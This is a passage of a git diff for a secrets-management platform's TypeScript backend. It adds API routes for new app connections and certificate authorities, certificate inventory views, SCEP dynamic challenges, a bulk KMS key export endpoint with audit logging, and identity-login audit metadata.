}, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + + const projects = await server.services.appConnection.ona.listProjects(connectionId, req.permission); + + return projects; + } + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/travis-ci-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/travis-ci-connection-router.ts new file mode 100644 index 00000000000..9aac4a68810 --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/travis-ci-connection-router.ts @@ -0,0 +1,93 @@ +import z from "zod"; + +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { 
+ CreateTravisCIConnectionSchema, + SanitizedTravisCIConnectionSchema, + UpdateTravisCIConnectionSchema +} from "@app/services/app-connection/travis-ci"; +import { AuthMode } from "@app/services/auth/auth-type"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerTravisCIConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.TravisCI, + server, + sanitizedResponseSchema: SanitizedTravisCIConnectionSchema, + createSchema: CreateTravisCIConnectionSchema, + updateSchema: UpdateTravisCIConnectionSchema + }); + + // The below endpoints are not exposed and for Infisical App use + server.route({ + method: "GET", + url: `/:connectionId/repositories`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listTravisCIRepositories", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + id: z.string(), + name: z.string(), + slug: z.string() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + + const repositories = await server.services.appConnection.travisCI.listRepositories(connectionId, req.permission); + + return repositories; + } + }); + + server.route({ + method: "GET", + url: `/:connectionId/branches`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listTravisCIBranches", + params: z.object({ + connectionId: z.string().uuid() + }), + querystring: z.object({ + repositoryId: z.string().min(1, "Repository ID is required") + }), + response: { + 200: z + .object({ + name: z.string(), + isDefault: z.boolean() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + const { repositoryId } = req.query; + + const branches = await server.services.appConnection.travisCI.listBranches( + connectionId, + repositoryId, + req.permission + ); 
+ + return branches; + } + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/venafi-tpp-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/venafi-tpp-connection-router.ts new file mode 100644 index 00000000000..5789a963337 --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/venafi-tpp-connection-router.ts @@ -0,0 +1,18 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateVenafiTppConnectionSchema, + SanitizedVenafiTppConnectionSchema, + UpdateVenafiTppConnectionSchema +} from "@app/services/app-connection/venafi-tpp"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerVenafiTppConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.VenafiTpp, + server, + sanitizedResponseSchema: SanitizedVenafiTppConnectionSchema, + createSchema: CreateVenafiTppConnectionSchema, + updateSchema: UpdateVenafiTppConnectionSchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-authority-routers/aws-acm-public-ca-certificate-authority-router.ts b/backend/src/server/routes/v1/certificate-authority-routers/aws-acm-public-ca-certificate-authority-router.ts new file mode 100644 index 00000000000..d916752b210 --- /dev/null +++ b/backend/src/server/routes/v1/certificate-authority-routers/aws-acm-public-ca-certificate-authority-router.ts @@ -0,0 +1,18 @@ +import { + AwsAcmPublicCaCertificateAuthoritySchema, + CreateAwsAcmPublicCaCertificateAuthoritySchema, + UpdateAwsAcmPublicCaCertificateAuthoritySchema +} from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas"; +import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; + +import { registerCertificateAuthorityEndpoints } from "./certificate-authority-endpoints"; + +export const 
registerAwsAcmPublicCaCertificateAuthorityRouter = async (server: FastifyZodProvider) => { + registerCertificateAuthorityEndpoints({ + caType: CaType.AWS_ACM_PUBLIC_CA, + server, + responseSchema: AwsAcmPublicCaCertificateAuthoritySchema, + createSchema: CreateAwsAcmPublicCaCertificateAuthoritySchema, + updateSchema: UpdateAwsAcmPublicCaCertificateAuthoritySchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-authority-routers/digicert-certificate-authority-router.ts b/backend/src/server/routes/v1/certificate-authority-routers/digicert-certificate-authority-router.ts new file mode 100644 index 00000000000..8e34e3c2d1a --- /dev/null +++ b/backend/src/server/routes/v1/certificate-authority-routers/digicert-certificate-authority-router.ts @@ -0,0 +1,18 @@ +import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; +import { + CreateDigiCertCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + UpdateDigiCertCertificateAuthoritySchema +} from "@app/services/certificate-authority/digicert/digicert-certificate-authority-schemas"; + +import { registerCertificateAuthorityEndpoints } from "./certificate-authority-endpoints"; + +export const registerDigiCertCertificateAuthorityRouter = async (server: FastifyZodProvider) => { + registerCertificateAuthorityEndpoints({ + caType: CaType.DIGICERT, + server, + responseSchema: DigiCertCertificateAuthoritySchema, + createSchema: CreateDigiCertCertificateAuthoritySchema, + updateSchema: UpdateDigiCertCertificateAuthoritySchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts b/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts index 81f36c9e7a6..d417ce835ef 100644 --- a/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts +++ 
b/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts @@ -6,16 +6,22 @@ import { readLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { AcmeCertificateAuthoritySchema } from "@app/services/certificate-authority/acme/acme-certificate-authority-schemas"; +import { AwsAcmPublicCaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas"; import { AwsPcaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-pca/aws-pca-certificate-authority-schemas"; import { AzureAdCsCertificateAuthoritySchema } from "@app/services/certificate-authority/azure-ad-cs/azure-ad-cs-certificate-authority-schemas"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; +import { DigiCertCertificateAuthoritySchema } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-schemas"; import { InternalCertificateAuthoritySchema } from "@app/services/certificate-authority/internal/internal-certificate-authority-schemas"; +import { VenafiTppCertificateAuthoritySchema } from "@app/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas"; const CertificateAuthoritySchema = z.discriminatedUnion("type", [ InternalCertificateAuthoritySchema, AcmeCertificateAuthoritySchema, AzureAdCsCertificateAuthoritySchema, - AwsPcaCertificateAuthoritySchema + AwsPcaCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + AwsAcmPublicCaCertificateAuthoritySchema, + VenafiTppCertificateAuthoritySchema ]); export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZodProvider) => { @@ -73,6 +79,30 @@ export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZ req.permission ); + const digicertCas = await 
server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.DIGICERT + }, + req.permission + ); + + const awsAcmPublicCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.AWS_ACM_PUBLIC_CA + }, + req.permission + ); + + const venafiTppCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.VENAFI_TPP + }, + req.permission + ); + await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, projectId: req.query.projectId, @@ -83,7 +113,10 @@ export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZ ...(internalCas ?? []).map((ca) => ca.id), ...(acmeCas ?? []).map((ca) => ca.id), ...(azureAdCsCas ?? []).map((ca) => ca.id), - ...(awsPcaCas ?? []).map((ca) => ca.id) + ...(awsPcaCas ?? []).map((ca) => ca.id), + ...(digicertCas ?? []).map((ca) => ca.id), + ...(awsAcmPublicCas ?? []).map((ca) => ca.id), + ...(venafiTppCas ?? []).map((ca) => ca.id) ] } } @@ -94,7 +127,10 @@ export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZ ...(internalCas ?? []), ...(acmeCas ?? []), ...(azureAdCsCas ?? []), - ...(awsPcaCas ?? []) + ...(awsPcaCas ?? []), + ...(digicertCas ?? []), + ...(awsAcmPublicCas ?? []), + ...(venafiTppCas ?? 
[]) ] }; } diff --git a/backend/src/server/routes/v1/certificate-authority-routers/index.ts b/backend/src/server/routes/v1/certificate-authority-routers/index.ts index 5b87322ac52..2e34156748d 100644 --- a/backend/src/server/routes/v1/certificate-authority-routers/index.ts +++ b/backend/src/server/routes/v1/certificate-authority-routers/index.ts @@ -1,9 +1,12 @@ import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; import { registerAcmeCertificateAuthorityRouter } from "./acme-certificate-authority-router"; +import { registerAwsAcmPublicCaCertificateAuthorityRouter } from "./aws-acm-public-ca-certificate-authority-router"; import { registerAwsPcaCertificateAuthorityRouter } from "./aws-pca-certificate-authority-router"; import { registerAzureAdCsCertificateAuthorityRouter } from "./azure-ad-cs-certificate-authority-router"; +import { registerDigiCertCertificateAuthorityRouter } from "./digicert-certificate-authority-router"; import { registerInternalCertificateAuthorityRouter } from "./internal-certificate-authority-router"; +import { registerVenafiTppCertificateAuthorityRouter } from "./venafi-tpp-certificate-authority-router"; export * from "./internal-certificate-authority-router"; @@ -12,5 +15,8 @@ export const CERTIFICATE_AUTHORITY_REGISTER_ROUTER_MAP: Record { + registerCertificateAuthorityEndpoints({ + caType: CaType.VENAFI_TPP, + server, + responseSchema: VenafiTppCertificateAuthoritySchema, + createSchema: CreateVenafiTppCertificateAuthoritySchema, + updateSchema: UpdateVenafiTppCertificateAuthoritySchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-inventory-view-router.ts b/backend/src/server/routes/v1/certificate-inventory-view-router.ts new file mode 100644 index 00000000000..80909783ffc --- /dev/null +++ b/backend/src/server/routes/v1/certificate-inventory-view-router.ts @@ -0,0 +1,260 @@ +import { z } from "zod"; + +import { CertificateInventoryViewsSchema } from "@app/db/schemas"; +import { 
EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { ApiDocsTags } from "@app/lib/api-docs"; +import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +const InventoryViewFiltersSchema = z + .object({ + status: z.string().max(100).optional(), + notAfterTo: z.coerce.date().optional(), + notAfterFrom: z.coerce.date().optional(), + notBeforeTo: z.coerce.date().optional(), + notBeforeFrom: z.coerce.date().optional(), + enrollmentTypes: z.array(z.string().max(64)).max(10).optional(), + keyAlgorithm: z.union([z.string().max(64), z.array(z.string().max(64)).max(10)]).optional(), + keySizes: z.array(z.number().int().positive()).max(10).optional(), + caIds: z.array(z.string().uuid()).max(50).optional(), + profileIds: z.array(z.string().uuid()).max(50).optional(), + source: z.union([z.string().max(64), z.array(z.string().max(64)).max(10)]).optional() + }) + .strict(); + +const ValidColumns = [ + "sanCn", + "serialNumber", + "enrollmentMethod", + "status", + "health", + "issuedAt", + "expiresAt", + "ca", + "profile", + "algorithm", + "source" +] as const; + +const ColumnsSchema = z.array(z.enum(ValidColumns)).max(20); + +export const registerCertificateInventoryViewRouter = async (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/:projectId/certificate-inventory-views", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "listCertificateInventoryViews", + tags: [ApiDocsTags.PkiCertificates], + description: "List system and custom certificate inventory views for a project.", + params: z.object({ + projectId: z.string().trim() + }), + response: { + 200: z.object({ + systemViews: z.array( + z.object({ + id: z.string(), + name: z.string(), + filters: z.object({ + status: z.array(z.string()).optional(), + notAfterTo: z.string().optional() + }), + columns: z.null(), + 
isSystem: z.literal(true), + createdByUserId: z.null() + }) + ), + sharedViews: z.array( + CertificateInventoryViewsSchema.extend({ + isSystem: z.literal(false), + isShared: z.literal(true) + }) + ), + customViews: z.array( + CertificateInventoryViewsSchema.extend({ + isSystem: z.literal(false), + isShared: z.literal(false) + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.certificateInventoryView.listViews({ + projectId: req.params.projectId, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + + server.route({ + method: "POST", + url: "/:projectId/certificate-inventory-views", + config: { + rateLimit: writeLimit + }, + schema: { + hide: true, + operationId: "createCertificateInventoryView", + tags: [ApiDocsTags.PkiCertificates], + description: "Create a custom certificate inventory view.", + params: z.object({ + projectId: z.string().trim() + }), + body: z.object({ + name: z.string().trim().min(1).max(255), + filters: InventoryViewFiltersSchema.default({}), + columns: ColumnsSchema.optional(), + isShared: z.boolean().default(false).optional() + }), + response: { + 200: z.object({ + view: CertificateInventoryViewsSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const view = await server.services.certificateInventoryView.createView({ + projectId: req.params.projectId, + name: req.body.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: req.params.projectId, + event: { + type: EventType.CREATE_CERTIFICATE_INVENTORY_VIEW, + metadata: { + viewId: 
view.id, + name: view.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared + } + } + }); + return { view }; + } + }); + + server.route({ + method: "PATCH", + url: "/:projectId/certificate-inventory-views/:viewId", + config: { + rateLimit: writeLimit + }, + schema: { + hide: true, + operationId: "updateCertificateInventoryView", + tags: [ApiDocsTags.PkiCertificates], + description: "Update a custom certificate inventory view.", + params: z.object({ + projectId: z.string().trim(), + viewId: z.string().uuid() + }), + body: z.object({ + name: z.string().trim().min(1).max(255).optional(), + filters: InventoryViewFiltersSchema.optional(), + columns: ColumnsSchema.optional(), + isShared: z.boolean().optional() + }), + response: { + 200: z.object({ + view: CertificateInventoryViewsSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const view = await server.services.certificateInventoryView.updateView({ + viewId: req.params.viewId, + projectId: req.params.projectId, + name: req.body.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: req.params.projectId, + event: { + type: EventType.UPDATE_CERTIFICATE_INVENTORY_VIEW, + metadata: { + viewId: view.id, + name: view.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared + } + } + }); + return { view }; + } + }); + + server.route({ + method: "DELETE", + url: "/:projectId/certificate-inventory-views/:viewId", + config: { + rateLimit: writeLimit + }, + schema: { + hide: true, + operationId: "deleteCertificateInventoryView", + tags: [ApiDocsTags.PkiCertificates], + description: "Delete a custom certificate inventory view.", + params: 
z.object({ + projectId: z.string().trim(), + viewId: z.string().uuid() + }), + response: { + 200: z.object({ + view: CertificateInventoryViewsSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const view = await server.services.certificateInventoryView.deleteView({ + viewId: req.params.viewId, + projectId: req.params.projectId, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: req.params.projectId, + event: { + type: EventType.DELETE_CERTIFICATE_INVENTORY_VIEW, + metadata: { + viewId: req.params.viewId, + name: view.name + } + } + }); + return { view }; + } + }); +}; diff --git a/backend/src/server/routes/v1/certificate-profiles-router.ts b/backend/src/server/routes/v1/certificate-profiles-router.ts index 37a53e8c75d..2e3f354ebf2 100644 --- a/backend/src/server/routes/v1/certificate-profiles-router.ts +++ b/backend/src/server/routes/v1/certificate-profiles-router.ts @@ -3,6 +3,7 @@ import { z } from "zod"; import { PkiCertificateProfilesSchema } from "@app/db/schemas"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { ScepChallengeType } from "@app/ee/services/pki-scep/challenge"; import { ApiDocsTags } from "@app/lib/api-docs"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; @@ -87,9 +88,12 @@ export const registerCertificateProfilesRouter = async ( .optional(), scepConfig: z .object({ - challengePassword: z.string().min(8), + challengeType: z.nativeEnum(ScepChallengeType).default(ScepChallengeType.STATIC), + challengePassword: z.string().optional(), includeCaCertInResponse: z.boolean().optional(), - allowCertBasedRenewal: z.boolean().optional() + allowCertBasedRenewal: z.boolean().optional(), + 
dynamicChallengeExpiryMinutes: z.number().int().min(1).max(1440).default(60), + dynamicChallengeMaxPending: z.number().int().min(1).max(1000).default(100) }) .optional(), externalConfigs: ExternalConfigUnionSchema, @@ -195,12 +199,15 @@ export const registerCertificateProfilesRouter = async ( .refine( (data) => { if (data.enrollmentType === EnrollmentType.SCEP) { - return !!data.scepConfig?.challengePassword; + if (!data.scepConfig) return false; + // Static mode requires a challenge password with min 8 chars; dynamic mode does not + if (data.scepConfig.challengeType === ScepChallengeType.DYNAMIC) return true; + return !!data.scepConfig.challengePassword && data.scepConfig.challengePassword.length >= 8; } return true; }, { - message: "SCEP enrollment type requires SCEP configuration with a challenge password" + message: "SCEP static challenge requires a challenge password with at least 8 characters" } ) .refine( @@ -357,7 +364,11 @@ export const registerCertificateProfilesRouter = async ( raCertificatePem: z.string(), raCertExpiresAt: z.date(), includeCaCertInResponse: z.boolean(), - allowCertBasedRenewal: z.boolean() + allowCertBasedRenewal: z.boolean(), + challengeType: z.string(), + challengeEndpointUrl: z.string().optional(), + dynamicChallengeExpiryMinutes: z.number().optional(), + dynamicChallengeMaxPending: z.number().optional() }) .optional(), externalConfigs: ExternalConfigUnionSchema, @@ -459,7 +470,11 @@ export const registerCertificateProfilesRouter = async ( raCertificatePem: z.string(), raCertExpiresAt: z.date(), includeCaCertInResponse: z.boolean(), - allowCertBasedRenewal: z.boolean() + allowCertBasedRenewal: z.boolean(), + challengeType: z.string(), + challengeEndpointUrl: z.string().optional(), + dynamicChallengeExpiryMinutes: z.number().optional(), + dynamicChallengeMaxPending: z.number().optional() }) .optional(), externalConfigs: ExternalConfigUnionSchema @@ -578,9 +593,12 @@ export const registerCertificateProfilesRouter = async ( .optional(), 
scepConfig: z .object({ - challengePassword: z.string().min(8).optional(), + challengeType: z.nativeEnum(ScepChallengeType).optional(), + challengePassword: z.string().optional(), includeCaCertInResponse: z.boolean().optional(), - allowCertBasedRenewal: z.boolean().optional() + allowCertBasedRenewal: z.boolean().optional(), + dynamicChallengeExpiryMinutes: z.number().int().min(1).max(1440).optional(), + dynamicChallengeMaxPending: z.number().int().min(1).max(1000).optional() }) .optional(), externalConfigs: ExternalConfigUnionSchema, @@ -634,6 +652,18 @@ export const registerCertificateProfilesRouter = async ( { message: "Cannot skip both External Account Binding (EAB) and DNS ownership verification at the same time." } + ) + .refine( + (data) => { + if (data.scepConfig?.challengePassword) { + if (data.scepConfig.challengeType === ScepChallengeType.DYNAMIC) return true; + return data.scepConfig.challengePassword.length >= 8; + } + return true; + }, + { + message: "SCEP static challenge requires a challenge password with at least 8 characters" + } ), response: { 200: z.object({ diff --git a/backend/src/server/routes/v1/certificate-router.ts b/backend/src/server/routes/v1/certificate-router.ts index c8302db3e16..2bacc31be08 100644 --- a/backend/src/server/routes/v1/certificate-router.ts +++ b/backend/src/server/routes/v1/certificate-router.ts @@ -436,6 +436,63 @@ export const registerCertificateRouter = async (server: FastifyZodProvider) => { } }); + server.route({ + method: "POST", + url: "/certificate-requests/:requestId/trigger-validation", + config: { + rateLimit: writeLimit + }, + schema: { + hide: false, + operationId: "triggerCertificateRequestValidation", + tags: [ApiDocsTags.PkiCertificates], + description: "Manually ask the issuing CA to re-check validation for a pending certificate request", + params: z.object({ + requestId: z.string().uuid() + }), + response: { + 200: z.object({ + status: z.nativeEnum(CertificateRequestStatus), + orderStatus: 
z.string().optional() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const result = await server.services.certificateAuthority.triggerCertificateRequestValidation({ + actor: req.permission.type, + actorId: req.permission.id, + actorAuthMethod: req.permission.authMethod, + actorOrgId: req.permission.orgId, + certificateRequestId: req.params.requestId + }); + + const orderStatus = "orderStatus" in result ? result.orderStatus : undefined; + const mappedStatus = + result.status === "skipped" + ? CertificateRequestStatus.PENDING_VALIDATION + : (result.status as CertificateRequestStatus); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: result.projectId, + event: { + type: EventType.TRIGGER_CERTIFICATE_REQUEST_VALIDATION, + metadata: { + certificateRequestId: req.params.requestId, + status: mappedStatus, + orderStatus + } + } + }); + + return { + status: mappedStatus, + orderStatus + }; + } + }); + server.route({ method: "GET", url: "/certificate-requests", diff --git a/backend/src/server/routes/v1/cmek-router.ts b/backend/src/server/routes/v1/cmek-router.ts index bb45738625b..0a6ded8679e 100644 --- a/backend/src/server/routes/v1/cmek-router.ts +++ b/backend/src/server/routes/v1/cmek-router.ts @@ -518,6 +518,60 @@ export const registerCmekRouter = async (server: FastifyZodProvider) => { } }); + server.route({ + method: "POST", + url: "/keys/bulk-export-private-keys", + config: { + rateLimit: readLimit + }, + schema: { + hide: false, + operationId: "bulkExportKmsKeyPrivateKeys", + tags: [ApiDocsTags.KmsKeys], + description: + "Bulk export multiple KMS keys. For asymmetric keys (sign/verify), both private and public keys are returned. 
For symmetric keys (encrypt/decrypt), the key material is returned.", + body: z.object({ + keyIds: z.array(z.string().uuid().describe(KMS.BULK_EXPORT_PRIVATE_KEYS.keyIds)).min(1).max(100) + }), + response: { + 200: z.object({ + keys: z.array( + z.object({ + keyId: z.string(), + name: z.string(), + keyUsage: z.string(), + algorithm: z.string(), + privateKey: z.string(), + publicKey: z.string().optional() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { + body: { keyIds }, + permission + } = req; + + const { keys, projectId } = await server.services.cmek.bulkGetPrivateKeys({ keyIds }, permission); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId, + event: { + type: EventType.CMEK_BULK_EXPORT_PRIVATE_KEYS, + metadata: { + keys: keys.map((k) => ({ keyId: k.keyId, name: k.name })) + } + } + }); + + return { keys }; + } + }); + server.route({ method: "GET", url: "/keys/:keyId/signing-algorithms", diff --git a/backend/src/server/routes/v1/dashboard-router.ts b/backend/src/server/routes/v1/dashboard-router.ts index 083daa20a9d..fd64ad84824 100644 --- a/backend/src/server/routes/v1/dashboard-router.ts +++ b/backend/src/server/routes/v1/dashboard-router.ts @@ -1686,7 +1686,7 @@ export const registerDashboardRouter = async (server: FastifyZodProvider) => { }), querystring: z.object({ offset: z.coerce.number(), - limit: z.coerce.number() + limit: z.coerce.number().max(1000) }), response: { 200: z.object({ diff --git a/backend/src/server/routes/v1/identity-alicloud-auth-router.ts b/backend/src/server/routes/v1/identity-alicloud-auth-router.ts index feaf8d6bb67..cdfa5560239 100644 --- a/backend/src/server/routes/v1/identity-alicloud-auth-router.ts +++ b/backend/src/server/routes/v1/identity-alicloud-auth-router.ts @@ -86,6 +86,13 @@ export const registerIdentityAliCloudAuthRouter = async (server: FastifyZodProvi await 
server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityAliCloudAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_ALICLOUD_AUTH, diff --git a/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts b/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts index bdd794226ee..1738f53795f 100644 --- a/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts +++ b/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts @@ -53,6 +53,13 @@ export const registerIdentityAwsAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityAwsAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_AWS_AUTH, diff --git a/backend/src/server/routes/v1/identity-azure-auth-router.ts b/backend/src/server/routes/v1/identity-azure-auth-router.ts index f8b7ee0c179..c8e1790e65c 100644 --- a/backend/src/server/routes/v1/identity-azure-auth-router.ts +++ b/backend/src/server/routes/v1/identity-azure-auth-router.ts @@ -48,6 +48,13 @@ export const registerIdentityAzureAuthRouter = async (server: FastifyZodProvider await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityAzureAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_AZURE_AUTH, diff --git a/backend/src/server/routes/v1/identity-gcp-auth-router.ts b/backend/src/server/routes/v1/identity-gcp-auth-router.ts index ddd117ea9a4..08b8a9a5010 100644 --- a/backend/src/server/routes/v1/identity-gcp-auth-router.ts +++ b/backend/src/server/routes/v1/identity-gcp-auth-router.ts @@ -48,6 +48,13 @@ export const registerIdentityGcpAuthRouter = async (server: 
FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityGcpAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_GCP_AUTH, diff --git a/backend/src/server/routes/v1/identity-jwt-auth-router.ts b/backend/src/server/routes/v1/identity-jwt-auth-router.ts index ffe14269c99..b415f15b195 100644 --- a/backend/src/server/routes/v1/identity-jwt-auth-router.ts +++ b/backend/src/server/routes/v1/identity-jwt-auth-router.ts @@ -124,6 +124,13 @@ export const registerIdentityJwtAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityJwtAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_JWT_AUTH, diff --git a/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts b/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts index 46aa20732ce..8e728b7395d 100644 --- a/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts +++ b/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts @@ -30,7 +30,8 @@ const IdentityKubernetesAuthResponseSchema = IdentityKubernetesAuthsSchema.pick( allowedNamespaces: true, allowedNames: true, allowedAudience: true, - gatewayId: true + gatewayId: true, + gatewayPoolId: true }).extend({ caCert: z.string(), tokenReviewerJwt: z.string().optional().nullable() @@ -69,6 +70,13 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityKubernetesAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_KUBERNETES_AUTH, @@ -189,6 +197,7 @@ export const 
registerIdentityKubernetesRouter = async (server: FastifyZodProvide allowedNames: z.string().describe(KUBERNETES_AUTH.ATTACH.allowedNames), allowedAudience: z.string().describe(KUBERNETES_AUTH.ATTACH.allowedAudience), gatewayId: z.string().uuid().optional().nullable().describe(KUBERNETES_AUTH.ATTACH.gatewayId), + gatewayPoolId: z.string().uuid().optional().nullable(), accessTokenTrustedIps: z .object({ ipAddress: z.string().trim() @@ -226,11 +235,22 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide message: "When token review mode is set to API, a Kubernetes host must be provided" }); } - if (data.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway && !data.gatewayId) { + if ( + data.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway && + !data.gatewayId && + !data.gatewayPoolId + ) { ctx.addIssue({ path: ["gatewayId"], code: z.ZodIssueCode.custom, - message: "When token review mode is set to Gateway, a gateway must be selected" + message: "When token review mode is set to Gateway, a gateway or gateway pool must be selected" + }); + } + if (data.gatewayId && data.gatewayPoolId) { + ctx.addIssue({ + path: ["gatewayPoolId"], + code: z.ZodIssueCode.custom, + message: "Cannot specify both a gateway and a gateway pool" }); } @@ -353,6 +373,7 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide allowedNames: z.string().optional().describe(KUBERNETES_AUTH.UPDATE.allowedNames), allowedAudience: z.string().optional().describe(KUBERNETES_AUTH.UPDATE.allowedAudience), gatewayId: z.string().uuid().optional().nullable().describe(KUBERNETES_AUTH.UPDATE.gatewayId), + gatewayPoolId: z.string().uuid().optional().nullable(), accessTokenTrustedIps: z .object({ 